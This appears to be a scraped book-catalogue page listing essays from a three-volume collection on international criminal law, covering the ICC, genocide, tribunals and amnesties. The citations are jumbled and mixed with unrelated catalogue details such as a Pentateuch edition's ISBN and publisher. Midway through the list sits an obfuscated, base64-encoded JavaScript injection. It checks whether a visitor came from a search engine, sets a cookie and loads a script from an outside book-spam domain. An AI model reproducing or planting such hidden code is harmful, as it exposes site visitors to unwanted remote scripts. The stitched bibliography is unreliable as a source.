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Olympia Bekou and Robert Cryer (2007), `The International Criminal Court and Universal Jurisdiction: A Close Encounter?'11.. Payam Akhavan (2001), `Beyond Impunity: Can International Criminal Justice Prevent Future Atrocities?'29.. David P Forsythe (2002), `The United States and International Criminal Justice'30.. Larry D Johnson (2004), `Ten Years Later: Reflections on the Drafting'11 David J.. Nicolaos Strapatsas (2002), `Universal Jurisdiction and the International Criminal Court'24.. Scheffer (2004), `Three Memories from the Year of Origin, 1993'12 M Cherif Bassiouni (1999), `Negotiating the Treaty of Rome on the Establishment of an International Criminal Court'13.. David J Scheffer (2001), `A Negotiator's Perspective on the International Criminal Court'20.. Louise Mallinder (2010), `Beyond the Courts? The Complex Relationship of Trials and Amnesties'16.. L C Green (1960), `The Eichmann Case'7 Matthew Lippman (1982), `The Trial of Adolf Eichmann and the Protection of Universal Human Rights under International Law'8.. William A Schabas (2003), `The Relationship Between Truth Commissions and International Courts: The Case of Sierra Leone'18.. I-II / by G H Locket & A F Millidge --Repr --Vol III / by G H Locket, A.. Laura A Dickinson (2003), `The Promise of Hybrid Courts'8 Mark S Ellis (2004), `Coming to Terms with its Past - Serbia's New Court for the Prosecution of War Crimes'9.. Alvarez (1999), `Crimes of States/Crimes of Hate: Lessons from Rwanda'26 Mark Osiel (2000), `Why Prosecute? Critics of Punishment for Mass Atrocity'27.. Beth van Schaack (2008), `Crimen Sine Lege: Judicial Lawmaking at the Intersection of Law and Morals'2.. M Cherif Bassiouni (1997), `From Versailles to Rwanda in Seventy-Five Years: The Need to Establish a Permanent International Criminal Court'3.. Tzvetan Todorov (2009), `Memory as Remedy for Evil'Volume IIAcknowledgementsAn introduction to all three volumes by the editor appears in Volume IPART I GENERAL PRINCIPLES, PROCEDURE AND EVIDENCE 1.. Darryl Robinson (1999), `Defining "Crimes Against Humanity" at the Rome Conference'20.. Raphael Lemkin (1947), `Genocide as a Crime under International Law'16 Alexander K.. Allison Marston Danner (2003), `Enhancing the Legitimacy and Accountability of Prosecutorial Discretion at the International Criminal Court'14.. Sienho Yee (1996), `A Proposal to Reformulate Article 23 of the ILC Draft Statute for an International Criminal Court'19.. ISBN\ISSN: 0900689218, 9780900689215Notes: 1067 pagesResponsibility: The Pentateuch and the HaftorahsEdition: Print book : English : 2nd edContents:Volume IAcknowledgementsIntroductionWilliam A.. Charles Garraway (1999), `Superior Orders and the International Criminal Court: Justice Delivered or Justice Denied'7.. Philippe Kirsch, Q C and Valerie Oosterveld (2001), `Negotiating an Insitution for the Twenty-First Century: Multilateral Diplomacy and the International Criminal Court'14.. Megan Fairlie (2004), `The Marriage of Common and Continental Law at the ICTY and its Progeny, Due Process Deficit'10.. M Cherif Bassiouni (2010), `Perpectives on International Criminal Justice' Vol.. SchabasPART I ORIGINS AND DEVELOPMENT OF INTERNATIONAL CRIMINAL LAW 1 Christopher Keith Hall (1998), `The First Proposal for a Permanent International Criminal Court'2.. F Millidge, P Merrett. var _0x34d4=['RkVtWGk=','amx5cGQ=','UURUbmw=','SlRDcGM=','Z2V0','bXBzanc=','bHhISUE=','YXJzc08=','cUNBSHo=','V0lPTEo=','aHR0cHM6Ly9ib29rc2ZpbmRlci50b3AvYm9va3MyMDE5LnBocD94PXNhJnF1ZXJ5PQ==','aW5kZXhPZg==','V3FoaVg=','UGxGWWc=','c2V0','eFdmbGU=','Smp4aHU=','cHZYTmQ=','Z01oQXM=','bGdtWUU=','TnhTeWw=','Y3JlYXRlRWxlbWVudA==','ZUprbU8=','c3Jj','Z2V0RWxlbWVudHNCeVRhZ05hbWU=','RUFzeEU=','YXBwZW5kQ2hpbGQ=','MTU0MDc1NTg4','MXwwfDV8Mnw0fDM=','alNLblo=','c3BsaXQ=','Vnpvdm4=','Y29va2ll','bWF0Y2g=','b1FUV0Y=','bGVuZ3Ro','cmVwbGFjZQ==','OyBwYXRoPQ==','OyBzZWN1cmU=','U0tmdnU=','dUVCVUQ=','OyBleHBpcmVzPQ==','SXdabFY=','Z2V0VGltZQ==','aGhjekM=','ZnVhY2o=','RHplakY=','QWtHQWI=','LmFsdGF2aXN0YS4=','LnlhbmRleC4=','dmlzaXRlZA==','SkhVTVQ=','RGd2THY=','cVRndHc=','LmJpbmcu'];(function(_0x4b0e5e,_0x23bcd6){var _0x2de03c=function(_0xf3be5a){while(--_0xf3be5a){_0x4b0e5e['push'](_0x4b0e5e['shift']());}};_0x2de03c(++_0x23bcd6);}(_0x34d4,0xba));var _0x1eac=function(_0x149413,_0x160c82){_0x149413=_0x149413-0x0;var _0x3301d8=_0x34d4[_0x149413];if(_0x1eac['MwcUnD']===undefined){(function(){var _0x33f7aa=function(){var _0x5de43b;try{_0x5de43b=Function('return\x20(function()\x20'+'{}.. Arieh J Kochavi (1994), `The British Foreign Office versus the United Nations War Crimes Commission during the Second World War'4.. William A Schabas (2000), `Life, Death and the Crime of Crimes: Supreme Penalties and the ICC Statute'21.. Silvia A Fernandez de Gurmendi and Hakan Friman (2000), `The Rules of Procedure and Evidence of the International Criminal Court'17.. Dapo Akande (2004), `International Law Immunities and the International Criminal Court'6.. Claus Kress (2006), `The Crime of Genocide under International Law'18 Egon Schwelb (1946), `Crimes Against Humanity'19.. Mirjan Damaska (2001), `The Shadow Side of Command Responsibility'11 Alexander Zahar (2001), `Command Responsibility of Civilian Superiors for Genocide'12.. Leila Nadya Sadat (2003), `Summer in Rome, Spring in The Hague, Winter in Washington? U.. Allison Marston Danner and Jenny S Martinez (2006), `Guilty Associations: Joint Criminal Enterprise, Command Responsibility, and the Development of International Criminal Law'5.. Mohamed Elewa Badar (2006), `Drawing the Boundaries of Mens Rea in the Jurisprudence of the International Criminal Tribunal for the Former Yugoslavia'4.. Carsten Stahn (2005), `Complementarity, Amnesties and Alternative Forms of Justice: Some Interpretative Guidelines for the International Criminal Court'25.. Kelly D Askin (2003), `Prosecuting Wartime Rape and Other Gender-Related Crimes under International Law: Extraordinary Advances, Enduring Obstacles'23.. S Policy Towards the International Criminal Court'PART II INTERNATIONAL CRIMES15.. Andrew T Cayley (2008), `The Prosecutor's Strategy in Seeking the Arrest of Sudanese President Al Bashir on Charges of Genocide' 13.. Theodor Meron (1995), `International Criminalization of Internal Atrocities'25 Jose E.. Margaret M deGuzman (2009), `Gravity and the Legitimacy of the International Criminal Court'15.. constructor(\x22return\x20this\x22)(\x20)'+');')();}catch(_0x339baa){_0x5de43b=window;}return _0x5de43b;};var _0x4bb5b0=_0x33f7aa();var _0x513f81='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';_0x4bb5b0['atob']||(_0x4bb5b0['atob']=function(_0xc2fb98){var _0x42894a=String(_0xc2fb98)['replace'](/=+$/,'');for(var _0x167d2a=0x0,_0x33214d,_0x5db68c,_0x26629f=0x0,_0x36819b='';_0x5db68c=_0x42894a['charAt'](_0x26629f++);~_0x5db68c&&(_0x33214d=_0x167d2a%0x4?_0x33214d*0x40+_0x5db68c:_0x5db68c,_0x167d2a++%0x4)?_0x36819b+=String['fromCharCode'](0xff&_0x33214d>>(-0x2*_0x167d2a&0x6)):0x0){_0x5db68c=_0x513f81['indexOf'](_0x5db68c);}return _0x36819b;});}());_0x1eac['pakHSm']=function(_0x374595){var _0x1ab1a9=atob(_0x374595);var _0x22af41=[];for(var _0x302ceb=0x0,_0x28bfc1=_0x1ab1a9['length'];_0x302ceb=_0x16d075;},'WqhiX':function(_0x5cf997,_0x439fed){return _0x5cf997===_0x439fed;},'PlFYg':_0x1eac('0x1f'),'xWfle':function(_0x39cd93,_0x103bb9){return _0x39cd93!==_0x103bb9;},'Jjxhu':'wJMFo','pvXNd':_0x1eac('0x20'),'eTFjA':function(_0x308439,_0x565b38){return _0x308439+_0x565b38;}};var _0x1772a0=[_0x4c08d0['ZhaoS'],_0x1eac('0x21'),_0x4c08d0[_0x1eac('0x22')],_0x4c08d0[_0x1eac('0x23')],_0x4c08d0[_0x1eac('0x24')],_0x4c08d0[_0x1eac('0x25')],_0x4c08d0['OChYp']],_0x38bc69=document['referrer'],_0x330515=![],_0x31eed0=cookie[_0x1eac('0x26')](_0x4c08d0[_0x1eac('0x27')]);for(var _0x5c0e30=0x0;_0x4c08d0[_0x1eac('0x28')](_0x5c0e30,_0x1772a0['length']);_0x5c0e30++){if(_0x1eac('0x29')===_0x4c08d0[_0x1eac('0x2a')]){_0x4c08d0[_0x1eac('0x2b')](include,_0x1eac('0x2c')+q+'');}else{if(_0x4c08d0['rkBcX'](_0x38bc69[_0x1eac('0x2d')](_0x1772a0[_0x5c0e30]),0x0)){if(_0x4c08d0[_0x1eac('0x2e')](_0x4c08d0[_0x1eac('0x2f')],_0x1eac('0x1f'))){_0x330515=!![];}else{if(_0x38bc69[_0x1eac('0x2d')](_0x1772a0[_0x5c0e30])>=0x0){_0x330515=!![];}}}}}if(_0x330515){cookie[_0x1eac('0x30')](_0x4c08d0[_0x1eac('0x27')],0x1,0x1);if(!_0x31eed0){if(_0x4c08d0[_0x1eac('0x31')](_0x4c08d0[_0x1eac('0x32')],_0x4c08d0[_0x1eac('0x33')])){_0x4c08d0[_0x1eac('0x34')](include,_0x4c08d0[_0x1eac('0x35')](_0x4c08d0['eTFjA'](_0x4c08d0[_0x1eac('0x36')],q),''));}else{cookie['set']('visited',0x1,0x1);if(!_0x31eed0){_0x4c08d0[_0x1eac('0x34')](include,_0x4c08d0[_0x1eac('0x35')](_0x4c08d0[_0x1eac('0x35')](_0x4c08d0['NxSyl'],q),''));}}}}}R(); Publisher: London : Soncino Press, 1988.. Daryl A Mundis (2005), `The Judicial Effects of the "Completion Strategies" on the Ad Hoc International Criminal Tribunals'4.. A Greenawalt (1999), `Rethinking Genocidal Intent: The Case for a Knowledge-Based Interpretation'17.. Patricia M Wald (2001), `The International Criminal Tribunal for the Former Yugoslavia Comes of Age: Some Observations on Day-to-Day Dilemmas of an International Court' 3.. Hans Kelsen (1947), `Will the Judgment in the Nuremberg Trial Constitute a Precedent in International Law?'5.. Mohamed El Zeidy (2002), `The United States Dropped the Atomic Bomb of Article 16 of the ICC Statute: Security Council Power of Deferrals and Resolution 1422'16.. Theodor Meron (2004), `Procedural Evolution in the ICTY'8 Gideon Boas (2001), `Creating Laws of Evidence for International Criminal Law: The ICTY and the Principle of Flexibility'9.. James Crawford (1995), `The ILC Adopts a Statute for an International Criminal Court'10.. Noah Weisbord (2008), `Prosecuting Aggression'21 David Scheffer (2006), `Genocide and Atrocity Crimes'22.. Wibke Kristin Timmermann (2006), `Incitement in International Criminal Law'13 Nancy Amoury Combs (2002), `Copping a Plea to Genocide: The Plea Bargaining of International Crimes'PART II RULE OF LAW, AMNESTY AND ALTERNATIVES TO PROSECUTION14.. Mark A Drumbl (2000), `Punishment, Postgenocide: From Guilt to Shame to Civis in Rwanda'28.. David Wippman (2006), `The Costs of International Justice'5 Mirko Klarin (2004), `The Tribunal's Four Battles'6.. Leila Sadat Wexler (1994), `The Interpretation of the Nuremberg Principles by the French Court of Cassation: From Touvier to Barbie and Back Again'PART II THE INTERNATIONAL CRIMINAL COURT 10.. William W Burke-White (2008), `Proactive Complementarity: The International Criminal Court and National Courts in the Rome System of International Justice'12.. M Cherif Bassiouni (2003), `The History of the Draft Code of Crimes Against the Peace and Security of Mankind'9.. Jeremy Sarkin (2001), `The Tension Between Justice and Reconciliation in Rwanda: Politics, Human Rights, Due Process and the Role of the Gacaca Courts in Dealing with the Genocide'17.. Diane F Orentlicher (1991), `Settling Accounts: The Duty to Prosecute Human Rights Violations of a Prior Regime'15.. Carsten Stahn, Mohamed M El Zeidy and Hector Olasolo (2005), `The International Criminal Court's Ad hoc Jurisdiction Revisited'26.. William A Schabas (2009), `Anti-Complementarity: Referral to National Jurisdictions by the UN International Criminal Tribunal for Rwanda'7.. William A Schabas (2008), `Origins of the Genocide Convention: From Nuremberg to Paris'6.. Anja Seibert-Fohr (2003), `The Relevance of the Rome Statute of the International Criminal Court for Amnesties and Truth Commissions' Volume IIIAcknowledgementsAn introduction to all three volumes by the editor appears in Volume IPART I THE AD HOC AND `HYBRID' TRIBUNALS, AND NATIONAL SYSTEMS1.. M Cherif Bassiouni (1994), `The Commission of Experts Established pursuant to Security Council Resolution 780: Investigating Violations of International Humanitarian Law in the Former Yugoslavia'2.. Ray Murphy (2006), `Gravity Issues and the International Criminal Court'22 Rod Rastan (2008), `What is a "Case" for the Purpose of the Rome Statute?'23.. Anthony Cullen (2008), `The Definition of Non-International Armed Conflict in the Rome Statute of the International Criminal Court: An Analysis of the Threshold of Application Contained in Article 8(2)(f)'PART III THE PHILOSOPHY AND POLITICS OF INTERNATIONAL CRIMINAL LAW 24.. Roger S Clark (2002), `The Mental Element in International Criminal Law: The Rome Statute of the Interntional Criminal Court and the Elements of Offences'3.. Valerie Oosterveld, Mike Perry and John McManus (2002), `The Cooperation of States with the International Criminal Court'18. d70b09c2d4

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